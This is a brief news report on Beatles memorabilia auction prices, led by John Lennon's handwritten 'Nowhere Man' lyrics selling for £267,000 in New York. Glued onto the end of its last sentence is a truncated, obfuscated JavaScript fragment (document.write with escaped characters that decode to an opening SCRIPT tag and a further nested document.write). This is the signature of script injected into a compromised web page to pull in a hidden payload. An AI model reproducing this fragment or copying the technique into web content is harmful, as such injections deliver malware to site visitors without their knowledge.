John Lennon's handwritten lyrics to the song 'Nowhere Man' have sold for £267,000 in New York.
The lyrics, penned by the former Beatle in 1965, formed part of a memorabilia auction at Christies yesterday and were expected to fetch around £60,000.
Earlier this year, two rolls of private film footage showing a day in the life of Lennon in 1974 was sold for just over £33,000 in New York, whilst a 1960s table owned by the musician fetched £2,400.
Elsewhere, a guitar played by George Harrison at the final Beatles concert recently sold for £257,902, with a signed copy of the band's 'Revolver album' making £21,600.
It just goes to show that most people really do have more money than sense.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
